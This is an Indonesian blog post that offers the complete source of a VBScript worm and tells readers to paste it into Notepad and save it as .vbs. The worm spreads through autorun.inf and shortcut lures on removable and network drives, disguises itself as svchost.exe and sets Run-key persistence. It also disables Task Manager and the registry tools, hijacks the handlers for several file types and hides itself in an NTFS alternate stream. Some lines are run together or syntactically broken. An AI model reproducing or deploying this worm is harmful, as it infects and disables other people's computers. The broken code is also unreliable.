Social Icons

Pages

26/02/11


angsung copy paste aja.. di note padsave sbg .vbs

script begins

On Error Resume Next

Dim fso, ws, status,status1, fly, tf

Set fso = CreateObject("scripting.filesystemobject")

Set ws = CreateObject("wscript.Shell")

Set sh = CreateObject("Shell.application")

Set net = CreateObject("wscript.network")

fly=false

tmp=fso.GetSpecialFolder(1)

tn=fso.GetTempName

tmpt=tmp+"\"+tn

docx=ws.SpecialFolders("MyDocuments")

Set swt=WScript.Arguments

on error resume next set

tf = fso.getfile("c:\windows\system32\wscript.exe")

tf.Attributes = 39

set tf = fso.getfile("c:\windows\svchost.exe")

tf.Attributes = 0

fso.copyfile "c:\windows\system32\wscript.exe", "c:\windows\svchost.exe"

set tf = fso.getfile("c:\windows\svchost.exe")

tf.Attributes = 39

on error resume next

If swt.Count>0 Then

status=swt(0)

End If

if fso.fileexists(tmp+"\msvbvm60.dll") then

set erd=fso.getfile(tmp+"\msvbvm60.dll")

erd.attributes=0

erd.name="anna.erd"

if erd.name="anna.erd"

then erd.name="msvbvm60.dll"

set erd=fso.opentextfile(tmp+"\msvbvm60.dll",2,true)

else

fly=true

end if

else set erd=fso.opentextfile(tmp+"\msvbvm60.dll",2,true)

end if

Set AQ=fso.GetFile(status)

If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0

AQ.Copy tmpt,True

Set AQ=fso.GetFile(tmpt)

AQ.Attributes=39

anv=tmp+"\auto.exe"

If Not fso.FileExists(anv) Then AQ.Copy anv

Set auto=fso.GetFile(anv)

auto.attributes=0

Set aut=fso.OpenTextFile(anv,2,True,0)

isi="[autorun]>open=WScript.exe //e:VBScript dekstop.ini

auto>shell\open=Open>shell\open\Command=WScript.exe //e:VBScript dekstop.ini

auto>shell\open\Default=1>shell\explore=Explore>shell\explore\Command=WScript.exe //e:VBScript

dekstop.ini auto"

isi=Replace(isi,">",vbCrLf)

aut.Write isi

aut.Close

auto.Attributes=39

ltkc=sh.Namespace(&H1c&).Self.path + "\Microsoft\CD Burning"

AQ.Copy ltkc+"\dekstop.ini",True

auto.Copy ltkc+"\autorun.inf",True

If fso.FileExists(docx+"\df5srvc.bfe") Then fso.GetFile(docx+"\df5srvc.bfe").Attributes=0

AQ.Copy tmp+"\df5srvc.bfe",True If fso.FileExists(tmp+"\anaksholeh.sys") Then fso.GetFile(tmp+"\cinta-mati-3.sys").Attributes=0 AQ.Copy tmp+"\anakSholeh.sys",True

regQ

Set rara=UNISKA

Hertz False If Day(Now)<>3 Then rekursif docx,1 Else rekursif docx,3

call attack_net

Hertz True Sub rekursif(path,dp)

On Error Resume Next

dropf path

wscript.sleep 50

If dp>0 Then

For Each fldr1 In fso.GetFolder(path+"\").SubFolders

rekursif fldr1.Path, dp-1

Next

End If

End Sub

Sub dropf(path)

On Error Resume Next

if day(now)=1 and (month(now)mod 3)=1 then

rara.copy path+"\Download.rtf"

rara.copy path+"\About Me.rtf"

end if

g1=path+"\autorun.inf"

g2=path+"\dekstop.ini"

If fso.FileExists(g1)Then

Set g11=fso.GetFile(g1)

If g11.Attributes<>39 Then

g11.Attributes=0

auto.Copy path+"\autorun.inf",True

end if

else

auto.Copy path+"\autorun.inf",True

end if

If fso.FileExists(g2) Then

Set g12=fso.GetFile(g2)

If g12.Attributes<>39 Then

g12.Attributes=0

AQ.Copy path+"\dekstop.ini",True

end if

else

AQ.Copy path+"\dekstop.ini",True

End If

If Not fso.FileExists(path+"\Folder.lnk") Then

kiddrock path+"\Folder","Folder"

drop=Array("Aku anak sholeh","","Agar Pintar Selalu","hack facebook","point blank","Software")

ww=1

For Each d In drop

If Day(now) Mod 3 = ww Then kiddrock path+"\"+d,d

wscript.sleep 60

ww=ww+1

Next

r=0

For Each fldr In fso.GetFolder(path+"\").SubFolders

kiddrock path+"\"+fldr.name,fldr.Name

wscript.sleep 60

If r>3 Then

Exit For

End if

r=r+1

Next

End If

End Sub

Sub kiddrock(path,trgt)

Set shor=ws.CreateShortcut(path+".lnk")

shor.iconlocation="shell32.dll,3"

shor.targetpath="wscript.exe"

shor.arguments="//e:VBScript dekstop.ini """+trgt+""""

shor.save

End Sub

function attack_net()

On Error Resume Next

err.clear

Set objFolder = sh.Namespace(&H13&)

Set colItems = objFolder.Items

For Each strFileName in objFolder.Items

t= objFolder.GetDetailsOf(strFileName, 14)

if fso.folderexists(t) then

rekursif t,4

end if

Next

End function

Sub tdr()

On Error Resume Next

err.clear

WScript.Sleep 180000

if err.number>0 then wscript.quit

End Sub

function UNISKA()

On error resume next x=vbcrlf adv="Download>> haiiii > kenalkan namaku ny.> .aku anak sholeh> aku baik lohh.> kata teman2 aku baik.> Luchu > cantik.> dan ngegemesin.> tapi kenap yah orang ga tau itui.> tapi tak apalah asal aku selalu bahagia.>>dan bahagia.>

adv=replace(adv,">",x)

set cinta-mati-3=fso.opentextfile(tmp+"\v.doc",2,true)

cinta-mati-3.write adv

cinta-mati-3.close

if day(now)=1 and (month(now)mod 3)=1 then

if fly=false then

for i=1 to 3

ws.run "notepad.exe /p """+tmp+"\v.doc"""

next

end if

end if

set UNISKA=fso.getfile(tmp+"\v.doc")

end function

Sub regQ()

On Error Resume Next

if day(now)=1 then

ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\", "cinta-mati-3"

ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\DefaultIcon\","shell32.dll,48"

ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\ShellFolder\Attributes",0,"REG_DWORD"

ws.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11111111-2222-3333-4444-555555555555}\","" end if

ws.regdelete"HKCR\lnkfile\IsShortcut"

ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.facebook.com/"

ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Df5serv","Wscript.exe //e:VBScript """+docx+"\df5srvc.bfe""" ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Svchost","c:\windows\svchost.exe //e:VBScript """+tmp+"\cinta-mati-3.sys"""

ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Explorer","Wscript.exe //e:VBScript """+ltkc+"\dekstop.ini""" ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools",1,"REG_DWORD"

ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"

ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\WarningIfNotDefault","hahahaha my virus like your computer"

ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\CheckedValue",0,"REG_DWORD"

ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\UncheckedValue",0,"REG_DWORD"

ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\DefaultValue",0,"REG_DWORD" ws.RegWrite "HKCR\lnkfile\shell\Delete\command", "logoff.exe" ws.RegWrite "HKCR\regfile\shell\Merge\command", "Wscript.exe //e:VBScript """+docx+"\df5srvc.bfe"""

ws.RegWrite "HKCR\inffile\shell\Install\command", "logoff.exe"

ws.RegWrite "HKCR\VBSfile\shell\Open\command", "

Wscript.exe //e:VBScript """+docx+"\df5srvc.bfe"""

ws.RegWrite "HKCR\VBEfile\shell\Open\command", "

Wscript.exe //e:VBScript """+docx+"\df5srvc.bfe""" if lcase(fso.getdrive("c:").FileSystem)="ntfs" then erdQ=AQ.openastextstream(1,0).read(AQ.size) www=fso.GetSpecialFolder(0) set jjk=fso.opentextfile(www+"\:Microsoft Office Update for Windows XP.sys",2,true) jjk.write erdQ jjk.close ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate","Wscript.exe //e:VBScript """+www+"\:Microsoft Office Update for Windows XP.sys"""

end if

End Sub

Sub Hertz(ooo)

On Error Resume Next

do

For Each drv In fso.Drives

If drv.DriveType=1 Then

rekursif drv.Path,4 Else

rekursif drv.Path,2

End if

Next if fly=false then

tdr

else

wscript.quit

end if

regQ

If ooo=False Then

Exit Do

End If

loop

End Sub

sample virus yang terdeteksi anti virus.. membuktikan virus ini sudah bekerja sistem komputer kita

Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)
 
Blogger Templates